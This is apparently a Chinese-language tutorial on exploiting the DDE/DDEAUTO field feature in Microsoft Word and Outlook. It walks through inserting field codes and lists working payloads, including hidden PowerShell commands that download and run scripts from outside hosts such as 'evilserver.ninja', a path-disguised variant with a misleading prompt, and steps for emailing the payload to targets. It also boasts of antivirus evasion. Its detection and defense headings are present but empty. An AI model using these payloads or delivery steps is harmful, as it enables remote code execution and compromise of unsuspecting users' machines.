步骤
Insert tab -> Quick Parts -> Field
中文版:插入 -> 文档部件 -> 域
选择= (Formula)
:
选择文字右键Toggle Field Codes(切换域代码)
:
替换内容为:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
注:第一部分DDEAUTO
是DDE字段提示,第二部分c:\\windows\\system32\\cmd.exe
为可执行文件的路径,第三部分calc.exe
为执行命令参数。
另外还可以直接使用快捷键CTRL+F9
创建一个空白的字段标识符然后直接插入DDE代码保存即可。
打开后效果如图:
PoC
Empire Payload:
{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}
Demo:
使用DDE标识也可以:
{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
当然还可以通过社工的手段来欺骗用户:
{DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -w hidden -NonI -c IEX(New-Object System.Net.WebClient).DownloadString('http://test.com/c.ps1');c.ps1" "图片无法加载"}
免杀效果:
禁用宏之后用利用DDE还可以执行PowerShell,,瑞星牛逼了...
OutLook
OutLook2013:
新建邮件-选择RTF格式-从Word中拷贝DDE payload进入邮件-然后发送给目标用户-用户点击回复邮件-利用成功
OutLook2016: 需要在新建邮件里先添加一个图片,其他步骤同上
检测
YARA规则:
恶意样本
防御
修改Windows注册表在MS Office中关闭DDE: